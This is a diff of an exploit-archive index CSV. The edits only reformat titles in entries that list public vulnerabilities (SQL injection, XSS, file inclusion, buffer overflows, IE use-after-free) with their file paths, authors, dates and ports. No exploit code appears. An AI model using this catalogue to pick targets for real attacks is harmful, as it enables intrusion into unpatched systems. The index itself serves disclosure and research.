31226,platforms/php/webapps/31226.txt,"Joomla! and Mambo com_detail Component - 'id' Parameter SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 -31228,platforms/php/webapps/31228.txt,"WordPress Recipes Blog Plugin 'id' Parameter SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 +31228,platforms/php/webapps/31228.txt,"WordPress Recipes Blog Plugin 'id' Parameter - SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 31230,platforms/php/webapps/31230.txt,"WordPress wp-people Plugin 2.0 - 'wp-people-popup.php' SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal Vulnerability",2008-02-19,"Luigi Auriemma",windows,remote,0 @@ -28621,7 +28621,7 @@ id,file,description,date,author,platform,type,port 31759,platforms/windows/remote/31759.txt,"Microsoft Internet Explorer 2.0 - UTF-7 HTTP Response Handling Weakness",2008-05-08,"Yaniv Miron",windows,remote,0 31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081 31761,platforms/linux/dos/31761.txt,"Embedthis Goahead Webserver 3.1.3-0 - Multiple Vulnerabilities",2014-02-19,"Maksymilian Motyl",linux,dos,80 -31762,platforms/windows/dos/31762.py,"Catia V5-6R2013 - ""CATV5_AllApplications"" - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555 +31762,platforms/windows/dos/31762.py,"Catia V5-6R2013 - _CATV5_AllApplications_ - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555 31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000 31764,platforms/hardware/webapps/31764.txt,"Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF Vulnerability",2014-02-19,"Dhruv Shah",hardware,webapps,80 31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent XSS Vulnerability",2014-02-19,Vulnerability-Lab,hardware,webapps,3378 @@ -28650,7 +28650,7 @@ id,file,description,date,author,platform,type,port 31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - GetHttpResponse() MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0 31789,platforms/windows/remote/31789.py,"PCMAN FTP 2.07 - Buffer Overflow Exploit",2014-02-20,Sumit,windows,remote,21 31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0 -31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - ""CATV5_Backbone_Bus"" - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555 +31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - _CATV5_Backbone_Bus_ - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555 31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80 31793,platforms/php/webapps/31793.txt,"Horde Turba 3.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps,0 31794,platforms/php/webapps/31794.txt,"PicsEngine 1.0 - 'index.php' Cross-Site Scripting Vulnerability",2008-05-14,ZoRLu,php,webapps,0 @@ -28821,7 +28821,7 @@ id,file,description,date,author,platform,type,port 31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80 31962,platforms/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080 31963,platforms/php/webapps/31963.txt,"E-topbiz Link ADS 1 - 'out.php' SQL Injection Vulnerability",2008-06-24,"Hussin X",php,webapps,0 -31964,platforms/windows/dos/31964.txt,"5th street 'dx8render.dll' Format String Vulnerability",2008-06-25,superkhung,windows,dos,0 +31964,platforms/windows/dos/31964.txt,"5th street - 'dx8render.dll' Format String Vulnerability",2008-06-25,superkhung,windows,dos,0 31965,platforms/linux/dos/31965.c,"Linux Kernel - utrace and ptrace Local Denial of Service Vulnerability (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0 31966,platforms/linux/dos/31966.c,"Linux Kernel - utrace and ptrace Local Denial of Service Vulnerability (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting Vulnerability",2008-06-26,"Erez Metula",asp,webapps,0 @@ -29072,12 +29072,12 @@ id,file,description,date,author,platform,type,port 32228,platforms/linux/remote/32228.xml,"Bugzilla <= 3.1.4 - '--attach_path' Directory Traversal Vulnerability",2008-08-12,"ilja van sprundel",linux,remote,0 32229,platforms/windows/dos/32229.txt,"hMailServer 4.4.1 IMAP Command Remote Denial of Service Vulnerability",2008-08-12,Antunes,windows,dos,0 32230,platforms/php/webapps/32230.txt,"IDevSpot PhpLinkExchange 1.01/1.02 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-12,sl4xUz,php,webapps,0 -32231,platforms/php/webapps/32231.txt,"Meet#Web 0.8 modules.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32232,platforms/php/webapps/32232.txt,"Meet#Web 0.8 ManagerResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32233,platforms/php/webapps/32233.txt,"Meet#Web 0.8 ManagerRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32234,platforms/php/webapps/32234.txt,"Meet#Web 0.8 RegForm.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32235,platforms/php/webapps/32235.txt,"Meet#Web 0.8 RegResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32236,platforms/php/webapps/32236.txt,"Meet#Web 0.8 RegRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32231,platforms/php/webapps/32231.txt,"Meet#Web 0.8 - modules.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32232,platforms/php/webapps/32232.txt,"Meet#Web 0.8 - ManagerResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32233,platforms/php/webapps/32233.txt,"Meet#Web 0.8 - ManagerRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32234,platforms/php/webapps/32234.txt,"Meet#Web 0.8 - RegForm.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32235,platforms/php/webapps/32235.txt,"Meet#Web 0.8 - RegResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32236,platforms/php/webapps/32236.txt,"Meet#Web 0.8 - RegRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 32237,platforms/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross-Site Scripting",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 32238,platforms/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross-Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 32286,platforms/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 - Directory Traversal Vulnerability",2008-08-21,"Deniz Cevik",linux,remote,0 @@ -29224,7 +29224,7 @@ id,file,description,date,author,platform,type,port 32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross-Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0 32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0 -32438,platforms/windows/remote/32438.rb,"Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0 +32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0 32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80 32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0 @@ -29251,7 +29251,7 @@ id,file,description,date,author,platform,type,port 32462,platforms/php/webapps/32462.txt,"Simple Machines Forum 1.1.6 HTTP POST Request Filter Security Bypass Vulnerability",2008-10-06,WHK,php,webapps,0 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b edit.php file Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 -32465,platforms/windows/remote/32465.pl,"Internet Download Manager <= 4.0.5 File Parsing Buffer Overflow Vulnerability",2008-10-06,Ciph3r,windows,remote,0 +32465,platforms/windows/remote/32465.pl,"Internet Download Manager <= 4.0.5 - File Parsing Buffer Overflow Vulnerability",2008-10-06,Ciph3r,windows,remote,0 32466,platforms/multiple/remote/32466.html,"Mozilla Firefox <= 3.0.3 Internet Shortcut Same Origin Policy Violation Vulnerability",2008-10-07,"Liu Die Yu",multiple,remote,0 32467,platforms/php/webapps/32467.txt,"Opera Web Browser <= 8.51 URI Redirection Remote Code Execution Vulnerability",2008-10-08,MATASANOS,php,webapps,0 32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI 'DFF_config[dir_include]' Parameter Multiple Remote File Include Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 @@ -29435,7 +29435,7 @@ id,file,description,date,author,platform,type,port 32651,platforms/php/webapps/32651.txt,"PhPepperShop 1.4 shop/Admin/shop_kunden_mgmt.php URL XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32652,platforms/php/webapps/32652.txt,"PhPepperShop 1.4 shop/Admin/SHOP_KONFIGURATION.php URL XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32653,platforms/asp/webapps/32653.txt,"dotnetindex Professional Download Assistant 0.1 SQL Injection Vulnerability",2008-12-09,ZoRLu,asp,webapps,0 -32654,platforms/windows/remote/32654.txt,"Internet Explorer 8 CSS 'expression' Property Cross-Site Scripting Filter Bypass Weakness",2008-12-11,"Rafel Ivgi",windows,remote,0 +32654,platforms/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass Weakness",2008-12-11,"Rafel Ivgi",windows,remote,0 32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products 'logon_processing.jsp' SQL Injection Vulnerabilities",2008-12-11,"3d D3v!L",jsp,webapps,0 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0 32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0 @@ -29595,7 +29595,7 @@ id,file,description,date,author,platform,type,port 32821,platforms/java/webapps/32821.html,"APC PowerChute Network Shutdown HTTP Response Splitting and Cross-Site Scripting Vulnerabilities",2009-02-26,"Digital Security Research Group",java,webapps,0 32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,metasploit,windows,remote,0 32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0 -32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 Language File Parsing Buffer Overflow Vulnerability",2009-02-27,"musashi karak0rsan",windows,dos,0 +32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow Vulnerability",2009-02-27,"musashi karak0rsan",windows,dos,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning Vulnerability",2009-02-27,"Matthew Dempsky",linux,remote,0 32826,platforms/windows/remote/32826.html,"iDefense COMRaider Active X Control 'write()' Arbitrary File Overwrite Vulnerability",2009-03-02,"Amir Zangeneh",windows,remote,0 32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0 @@ -29623,7 +29623,7 @@ id,file,description,date,author,platform,type,port 32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Local Privilege Escalation Vulnerability",2009-03-10,"Sun Microsystems",linux,local,0 32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0 32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0 -32851,platforms/windows/remote/32851.html,"Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-14,"Jean-Jamil Khalife",windows,remote,0 +32851,platforms/windows/remote/32851.html,"Microsoft Internet Explorer 10 - CMarkup Use-After-Free (MS14-012)",2014-04-14,"Jean-Jamil Khalife",windows,remote,0 32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 - 'tiki-galleries.php' Cross-Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 - 'tiki-list_file_gallery.php' Cross-Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 - 'tiki-listpages.php' Cross-Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 @@ -29932,10 +29932,10 @@ id,file,description,date,author,platform,type,port 33164,platforms/multiple/remote/33164.txt,"WebKit Floating Point Number Remote Buffer Overflow Vulnerability",2009-08-11,Apple,multiple,remote,0 33165,platforms/hardware/remote/33165.txt,"2Wire Routers 'CD35_SETUP_01' - Access Validation Vulnerability",2009-08-12,hkm,hardware,remote,0 33166,platforms/php/webapps/33166.txt,"Discuz! 6.0 - '2fly_gift.php' SQL Injection Vulnerability",2009-08-15,Securitylab.ir,php,webapps,0 -33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_authenticatewizarduser.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 -33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/logviewer/searchlog.cfm startRow Parameter XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 -33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_logintowizard.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 -33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/enter.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server <= 8.0.1 - wizards/common/_authenticatewizarduser.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server <= 8.0.1 - administrator/logviewer/searchlog.cfm startRow Parameter XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server <= 8.0.1 - wizards/common/_logintowizard.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server <= 8.0.1 - administrator/enter.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 33171,platforms/asp/webapps/33171.txt,"DUWare DUgallery 3.0 - 'admin/edit.asp' Authentication Bypass Vulnerability",2009-08-17,spymeta,asp,webapps,0 33172,platforms/windows/remote/33172.txt,"Valve Software Source Engine - Format String Vulnerability",2009-08-17,"Luigi Auriemma",windows,remote,0 33173,platforms/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service Vulnerability (1)",2007-02-07,trevordixon,windows,dos,0 @@ -30032,7 +30032,7 @@ id,file,description,date,author,platform,type,port 33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution Vulnerability",2009-10-13,Skylined,windows,remote,0 33271,platforms/windows/dos/33271.py,"VMware Player and Workstation <= 6.5.3 - 'vmware-authd' Remote Denial of Service Vulnerability",2009-10-07,shinnai,windows,dos,0 33272,platforms/windows/remote/33272.txt,"Autodesk 3ds Max Application Callbacks Arbitrary Command Execution Vulnerability",2009-10-23,"Sebastian Tello",windows,remote,0 -33264,platforms/windows/remote/33264.txt,"Internet Explorer 8 X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 +33264,platforms/windows/remote/33264.txt,"Microsoft Internet Explorer 8 - X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene TOC File Remote Code Execution Vulnerability",2009-11-23,"Diego Juarez",windows,remote,0 33590,platforms/php/webapps/33590.txt,"Joomla! AutartiTarot Component Directory Traversal Vulnerability",2010-02-01,B-HUNT3|2,php,webapps,0 33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Command Directory Traversal Vulnerability",2010-02-15,fb1h2s,windows,remote,0 @@ -30112,14 +30112,14 @@ id,file,description,date,author,platform,type,port 33368,platforms/php/webapps/33368.html,"FireStats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting and Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 33370,platforms/multiple/webapps/33370.html,"ElasticSearch Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps,0 33371,platforms/php/webapps/33371.txt,"WordPress WP-Cumulus Plugin 1.x - 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-11-09,MustLive,php,webapps,0 -33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for WordPress CAPTCHA Security Bypass Vulnerability",2009-11-13,MustLive,php,webapps,0 -33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 WordPress Plugin Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 +33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for WordPress CAPTCHA - Security Bypass Vulnerability",2009-11-13,MustLive,php,webapps,0 +33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 WordPress Plugin - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x graph.php Multiple Parameter XSS",2009-11-21,"Moritz Naumann",php,webapps,0 33375,platforms/php/webapps/33375.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 Delete Function Cross-Site Request Forgery Vulnerability",2009-11-24,"Alice Kaerast",php,webapps,0 33376,platforms/php/webapps/33376.pl,"klinza professional CMS 5.0.1 - 'menulast.php' Local File Include Vulnerability",2009-11-24,klinza,php,webapps,0 33377,platforms/php/webapps/33377.txt,"Joomla! ProofReader 1.0 RC9 Component Cross-Site Scripting Vulnerability",2009-11-16,MustLive,php,webapps,0 33378,platforms/php/webapps/33378.txt,"Joomla! 1.5.x 404 Error Page Cross-Site Scripting Vulnerability",2009-11-23,MustLive,php,webapps,0 -33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 404 Error Page Cross-Site Scripting Vulnerability",2009-09-02,MustLive,multiple,remote,0 +33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting Vulnerability",2009-09-02,MustLive,multiple,remote,0 33380,platforms/php/webapps/33380.txt,"Power Phlogger 2.2.x - Cross-Site Scripting Vulnerability",2008-02-16,MustLive,php,webapps,0 33381,platforms/php/webapps/33381.txt,"Content Module 0.5 for XOOPS 'id' Parameter SQL Injection Vulnerability",2009-11-30,s4r4d0,php,webapps,0 33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS - 'categoryid' Parameter Cross-Site Scripting Vulnerability",2009-11-30,SoldierOfAllah,php,webapps,0 @@ -30130,7 +30130,7 @@ id,file,description,date,author,platform,type,port 33387,platforms/linux/local/33387.txt,"check_dhcp - Nagios Plugins <= 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0 33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - (.fig) Buffer Overflow Vulnerability",2009-12-03,pedamachephepto,linux,remote,0 33389,platforms/php/webapps/33389.txt,"EGroupware 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80 -33390,platforms/php/webapps/33390.txt,"Yoast Google Analytics for WordPress Plugin 3.2.4 404 Error Page Cross-Site Scripting Vulnerability",2009-12-04,intern0t,php,webapps,0 +33390,platforms/php/webapps/33390.txt,"Yoast Google Analytics for WordPress Plugin 3.2.4 - 404 Error Page Cross-Site Scripting Vulnerability",2009-12-04,intern0t,php,webapps,0 33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting Vulnerability",2009-12-07,"aBo MoHaMeD",php,webapps,0 33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component - 'yt_color' Parameter Cross-Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0 33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template Cross-Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0 @@ -30396,7 +30396,7 @@ id,file,description,date,author,platform,type,port 33729,platforms/multiple/dos/33729.txt,"PostgreSQL <= 8.4.1 JOIN Hashtable Size Integer Overflow Denial Of Service Vulnerability",2014-06-13,"Bernt Marius Johnsen",multiple,dos,0 33730,platforms/asp/webapps/33730.txt,"Max Network Technology BBSMAX <= 4.2 - 'threadid' Parameter Cross-Site Scripting Vulnerability",2010-03-10,Liscker,asp,webapps,0 33731,platforms/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 Login SQL Injection Vulnerability",2010-03-10,"Yaniv Miron",multiple,webapps,0 -33732,platforms/php/webapps/33732.txt,"60cycleCMS 'select.php' Multiple HTML Injection Vulnerabilities",2010-03-10,"pratul agrawal",php,webapps,0 +33732,platforms/php/webapps/33732.txt,"60cycleCMS - 'select.php' Multiple HTML Injection Vulnerabilities",2010-03-10,"pratul agrawal",php,webapps,0 33733,platforms/windows/dos/33733.pl,"httpdx 1.5.3 PNG File Handling Remote Denial of Service Vulnerability",2010-03-10,"Jonathan Salwan",windows,dos,0 33734,platforms/php/webapps/33734.txt,"DDL CMS 2.1 - 'blacklist.php' Cross-Site Scripting Vulnerability",2010-03-10,ITSecTeam,php,webapps,0 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0 @@ -30472,7 +30472,7 @@ id,file,description,date,author,platform,type,port 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component - 'id' Parameter SQL Injection Vulnerability",2010-03-29,"Pouya Daneshmand",php,webapps,0 -33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress 'plugins.php' SQL Injection Vulnerability",2008-12-13,MustLive,php,webapps,0 +33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress - 'plugins.php' SQL Injection Vulnerability",2008-12-13,MustLive,php,webapps,0 33814,platforms/php/webapps/33814.txt,"Piwik <= 0.5.5 - 'form_url' Parameter Cross-Site Scripting Vulnerability",2010-03-31,garwga,php,webapps,0 33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Parameter Cross-Site Scripting Vulnerability",2010-03-31,"CONIX Security",php,webapps,0 33816,platforms/multiple/remote/33816.pl,"Miranda IM <= 0.8.16 Information Disclosure Vulnerability",2010-04-06,"Jan Schejbal",multiple,remote,0 @@ -30509,7 +30509,7 @@ id,file,description,date,author,platform,type,port 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 Memory Consumption Remote Denial of Service Vulnerability",2010-04-27,fallenpegasus,linux,dos,0 33851,platforms/php/webapps/33851.txt,"Wordpress TimThumb 2.8.13 WebShot - Remote Code Execution (0day)",2014-06-24,@u0x,php,webapps,0 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0 -33860,platforms/windows/dos/33860.html,"Internet Explorer 8_ 9 & 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 +33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module 'externalredirect.php' Cross-Site Scripting Vulnerability",2010-04-20,"Edgard Chammas",php,webapps,0 33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Parameter Cross-Site Scripting Vulnerability",2010-04-24,Liscker,php,webapps,0 33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double Free Memory Corruption Vulnerability",2010-04-20,"Joel Johnson",linux,remote,0 @@ -30575,7 +30575,7 @@ id,file,description,date,author,platform,type,port 33970,platforms/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 URI Cross-Site Scripting Vulnerability",2010-05-10,"High-Tech Bridge SA",php,webapps,0 33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 - Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0 33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 - Local File Include and HTML Injection Vulnerabilities",2010-04-30,"Jordi Chancel",php,webapps,0 -33914,platforms/php/webapps/33914.txt,"4xcms 'login.php' Multiple SQL Injection Vulnerabilities",2010-03-21,"cr4wl3r ",php,webapps,0 +33914,platforms/php/webapps/33914.txt,"4xcms - 'login.php' Multiple SQL Injection Vulnerabilities",2010-03-21,"cr4wl3r ",php,webapps,0 33915,platforms/php/webapps/33915.txt,"Campsite 3.x - 'article_id' Parameter SQL Injection Vulnerability",2010-04-30,"Stefan Esser",php,webapps,0 33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 - 'archives.cfm/search' Cross-Site Scripting Vulnerability",2010-05-03,MustLive,cfm,webapps,0 33917,platforms/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 - 'primary_number' Parameter SQL Injection Vulnerability",2010-05-02,indoushka,php,webapps,0 @@ -30607,7 +30607,7 @@ id,file,description,date,author,platform,type,port 33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 - 'PlayerOcx.ocx' Active X Control Arbitrary File Overwrite Vulnerability.",2010-02-03,"Evdokimov Dmitriy",windows,remote,0 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80 33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080 -33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 4.1.x Bypass (MS12-037)",2014-07-01,sickness,windows,remote,0 +33944,platforms/windows/remote/33944.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 4.1.x Bypass (MS12-037)",2014-07-01,sickness,windows,remote,0 